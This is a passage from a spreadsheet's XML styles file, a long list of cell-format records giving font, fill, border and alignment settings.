    <xf numFmtId="0" fontId="106" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="106" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="106" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="85" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="107" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="104" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="2"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="2"/>
    </xf>
    <xf numFmtId="0" fontId="111" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="104" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="112" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="36" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="116" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="9" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="118" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="102" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="119" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="46" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="120" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="90" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="85" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="121" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="104" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="122" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="108" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="46" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="93" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="94" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="93" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="93" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="46" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="125" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="104" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="90" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="106" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="107" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="105" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="108" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="52" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="85" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="68" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" textRotation="90"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="69" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" textRotation="90"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="112" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="117" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="115" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="75" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="73" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="75" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="73" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="68" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="69" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="85" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="85" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="47" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="36" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="48" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="47" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="48" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="40" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" textRotation="180" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" textRotation="180" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" textRotation="180" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="19" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="20" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="33" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="34" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="35" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="7" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="7" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="7" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="7" borderId="17" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="7" borderId="8" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="7" borderId="18" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="19" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="20" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="2" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="3" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="3" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="6" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="5" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="6" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="7" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
